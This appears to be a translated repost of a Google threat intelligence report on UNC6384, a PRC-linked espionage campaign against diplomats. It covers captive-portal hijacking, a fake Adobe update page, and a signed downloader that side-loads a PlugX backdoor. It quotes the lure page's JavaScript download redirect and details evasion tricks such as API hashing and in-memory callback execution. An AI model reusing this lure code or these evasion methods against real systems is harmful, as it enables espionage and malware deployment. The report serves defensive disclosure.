21.08.2025
10 min
641
Chinese cyberspies continue to refine their attack methods, using fake updates and intercepting Internet traffic. According to Google Threat Intelligence Group, the PRC-nexus group has targeted diplomats in Southeast Asia and beyond. The attackers used a sophisticated infection chain: fake “update” pages, a digitally signed STATICPLUGIN downloader, a hidden CANONSTAGER module, and a malicious SOGU.SEC (PlugX) backdoor. This approach allowed them to evade antivirus detection and maintain a presence on victims’ systems.
In March 2025, the Google Threat Intelligence Group (GTIG) uncovered a sophisticated, multi-faceted campaign attributed to the PRC-linked cyberespionage actor UNC6384. The campaign targeted diplomats in Southeast Asia and other organizations around the world. GTIG assesses that it was likely designed to support cyberespionage operations that served the strategic interests of the People’s Republic of China (PRC).
The campaign hijacks targeted web traffic using portal redirects to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN. This ultimately resulted in the deployment of the SOGU.SEC backdoor (also known as PlugX) in RAM. This multi-stage attack chain uses advanced social engineering, including valid code signing certificates, man-in-the-middle (AitM) attacks, and indirect execution techniques to evade detection.
Google is proactively protecting its users and customers from this threat. We have sent a government-backed threat actor notification to all Gmail and Workspace users affected by this campaign. We encourage users to enable enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable two-step verification on their accounts. In addition, all detected domains, URLs, and file hashes have been added to the Google Safe Browsing list of dangerous web resources. Google Security Operations (SecOps) has also been updated with relevant data, allowing defenders to detect this activity in their environment.
This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the attacker’s operational capabilities. We examine how the malware is delivered, how the attacker used social engineering and evasion techniques, and the technical aspects of the multi-stage malware deployment.
In this campaign, the malware payloads were disguised as software updates or plugins and delivered via the UNC6384 infrastructure using AitM and social engineering tactics. An overview of the attack chain:
The target device’s web browser checks if the internet connection is behind the access portal;
AitM redirects the browser to a website controlled by the attacker;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves the MSI package from the same website;
Finally, CANONSTAGER is loaded with a DLL and deploys the SOGU.SEC backdoor.
GTIG has found evidence of a hijacking portal being used to deliver malware disguised as an Adobe plugin update to targets. A hijacking portal is a network configuration that redirects users to a specific web page, typically a login or splash page, before providing access to the Internet. This functionality is intentionally built into all web browsers. The Chrome browser makes an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to trigger this redirect mechanism.
While “gstatic.com” is a legitimate domain, our investigation found redirect chains from this domain leading to the attacker’s target web page and subsequent malware delivery, indicating an AitM attack. We assess that AitM was carried out via compromised peripherals on the targeted networks. However, GTIG did not observe an attack vector used to compromise peripheral devices.
Once redirected, the attacker attempts to trick the target into believing that a software update is needed and download malware disguised as a “plugin update.” The attacker used several social engineering techniques to create a coherent and credible update theme.
The landing page resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. Using HTTPS offers several advantages for social engineering and malware delivery. Browser warnings such as “Not Secure” and “Your Connection is Not Private” will not be displayed to the target platform, and the connection to the website is encrypted, making it difficult for network security to inspect and detect malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a certification authority.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R10
Validity
Not Before: May 17 16:58:11 2025 GMT
Not After : Aug 15 16:58:10 2025 GMT
Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Сертифікат TLS веб-сайту
The initial landing page is completely blank with a yellow bar at the top and a button that says “Install Missing Plugins…” If this method successfully fools the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.
In the background, Javascript code is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target object point clicks the install button, “myFunction” located in the loaded script is executed.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
Javascript зAdobePlugins.html
Inside « myFunction» another image is loaded to display as a background image on the web page. The browser window location is also set to the URL of the executable, again hosted on the same domain.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https//mediareleaseupdates[.]com/AdobePlugins.exe";
}
Javascript зstyle3.js
This triggers the automatic download of “AdobePlugins.exe” and a new background image that will be displayed on the web page. The image shows instructions for executing the downloaded binary and bypassing potential Windows protections.
When the downloaded executable is launched, a fake installation prompt is displayed on the screen, as seen in the screenshot above for “STEP 2,” along with the options “Install” and “Cancel.” However, the SOGU.SEC payload is likely already running on the target device, as none of the buttons trigger any malware-related actions.
After successfully delivering to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage involves tactics aimed at bypassing host defenses and maintaining stealth on the affected system. Finally, a new side-loaded DLL, tracked as CANONSTAGER, culminates in the deployment of the SOGU.SEC backdoor in RAM, which then establishes communication with the attacker’s command and control (C2) server.
The downloaded AdobePlugins.exe file ” ” is a first-stage malware loader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the primary advantage of being able to bypass endpoint protections that would normally trust files with valid digital signatures. This gives the malware a false sense of legitimacy, making it difficult for both users and automated defense systems to detect.
The binary was code-signed on May 9, 2025, which may indicate how long this version of the loader has been in use. Although the signing certificate expired on July 14, 2025 and is no longer valid, it could be easy for an attacker to re-sign new versions of STATICPLUGIN using similarly obtained certificates.
STATICPLUGIN implements its own TForm that masquerades as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from “https//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. Once these files are installed, CANONSTAGER is executed via a third-party DLL load.
File name Description Hash
cnmpaui.exe Canon IJ Printer Assistant Tool 4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3
cnmpaui.dll CANONSTAGER e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011
cnmplog.dat RC4 Encrypted SOGU.SEC cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79
Our investigation revealed that this is not the first suspicious executable signed by a certificate issued by Chengdu Nuoxin Times Technology Co., Ltd. GTIG currently tracks 25 known malware samples signed by this signer, which are used by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available on VirusTotal.
GTIG previously investigated two additional campaigns using malware signed by this organization. While GTIG does not link these other campaigns to UNC6384, they share numerous similarities and TTP matches with this UNC6384 campaign, in addition to using the same code signing certificates.
Delivery via web redirects
First stage of download, sometimes packaged in an archive.
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate programs or updates
Targeting in Southeast Asia
It remains an open question how the attackers obtain these certificates. The subscribing organization could be a victim with compromised code signing material. However, it could also be a willing participant or a front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG continues to monitor the connection between this organization and PRC-nexus cyber operations.
Once CANONSTAGER executes, its ultimate goal is to stealthily execute an encrypted payload, a variant of SOGU, tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and local stream storage (TLS). The launcher also uses legitimate Windows features, such as window procedures, message queues, and callback functions, to execute the final payload.
Thread Local Storage (TLS) is designed to provide each thread in a multithreaded application with its own private data store. CANONSTAGER uses the TLS array data structure to store function addresses determined using its own API hashing algorithm. The function addresses are later called throughout the binary from offsets in the TLS array.
In short, API hashing hides which Windows APIs are being used, while the TLS array provides a hidden place to store the resolved function addresses. The use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tools that are scrutinizing more common data storage locations.
Below is an example of how CANONSTAGER resolves and stores the GetCurrentDirectoryW function address.
Fix GetCurrentDirectoryW hash issue (0x6501CBE1)
Get TLS array location from thread information block (TIB)
Move resolved function address to offset 0x8 of TLS array
CANONSTAGER hides its startup code in a custom window procedure and starts its execution indirectly by using the Windows message queue. Using these legitimate Windows features reduces the likelihood of malware detection and alerting security tools. It also hides the malware’s control flow by “hiding” its code inside the window procedure and starting execution asynchronously.
At a high level, CANONSTAGER:
Registers a class containing a callback function;
Creates a new window with the registered class;
Sends WM_SHOWWINDOW to the message queue;
Enters a message loop to receive and send messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives a WM_SHOWWINDOW message; then
Executes SOGU.SEC in memory using the EnumSystemGeoID callback.
In Windows, each window class has an associated window procedure. The procedure allows programmers to define their own function to handle messages sent to the specified window class.
CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure to handle the messages. In addition, the window is created with a zero height and width to remain hidden on the screen.
Inside the window procedure, a check is made for the presence of a message of type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and runs the SOGU.SEC payload. For any message type other than 0x0018 (or 0x2 for ExitProcess), the window procedure calls the default handler (DefWindowProc), ignoring the message.
Windows applications use message queues for asynchronous communication. Both user programs and the Windows system can send messages to message queues. When a message is sent to an application window, the system calls the appropriate window procedure to handle the message.
To launch the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a WM_SHOWWINDOW message (0x0018) to its newly created window via the message queue. Since the system or other programs can also send messages to the CANONSTAGER window, the standard Windows message loop is triggered. This allows all messages sent, including the scheduled WM_SHOWWINDOW message, to be sent.
GetMessageW – Get all messages in the thread’s message queue.
TranslateMessage – Converts a message from a “virtual key” to a “symbolic message”.
DispatchMessage – Delivers the message to a specific function (WindowProc) that handles the message for the window to which the message is directed.
Return to 1 until all messages have been sent.
Once the window procedure receives a message of the correct type, CANONSTAGER proceeds to deploy the SOGU.SEC payload by performing the following steps:
Read the encrypted cnmplog.datfile ” ” contained in the downloaded MSI file;
Decrypt the file using the hardcoded 16-byte RC4 key;
Execute the decrypted payload using the EnumSystemsGeoID callback function.
UNC6384 previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, avoid detection, obfuscate control flow, and blend in with normal system activity. Furthermore, all of these steps are performed in memory, avoiding detection based on endpoint files.
SOGU.SEC is a distinct variant of SOGU that is commonly used by UNC6384 in cyber espionage activities. It is a sophisticated and heavily obfuscated malware backdoor with a wide range of capabilities. It can collect system information, upload and download files from the C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed to directly contact the C2 IP address “166.88.2[.]90” using HTTPS.
GTIG attributes this campaign to UNC6384, a PRC-linked cyber espionage group, and TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, security partner programs, targeting, and command and control (C2) infrastructure overlaps. UNC6384 and TEMP.Hex have been observed targeting government sectors, primarily in Southeast Asia, in line with PRC strategic interests. Both groups have also been observed distributing the SOGU.SEC malware from malware DLL loaders and using the same C2 infrastructure.
This campaign is a prime example of the continued evolution of UNC6384’s operational capabilities and highlights the sophistication of PRC-nexus-linked attackers. The use of advanced techniques such as AitM, combined with valid code signing and multi-layered social engineering, demonstrates the capabilities of this attacker. This activity is consistent with a broader trend that GTIG has observed where PRC-nexus-related attackers are increasingly using stealthy tactics to evade detection.
GTIG actively monitors ongoing threats from entities such as UNC6384 to protect users and customers. As part of this effort, Google is continuously updating its defenses and has taken specific actions against this campaign.
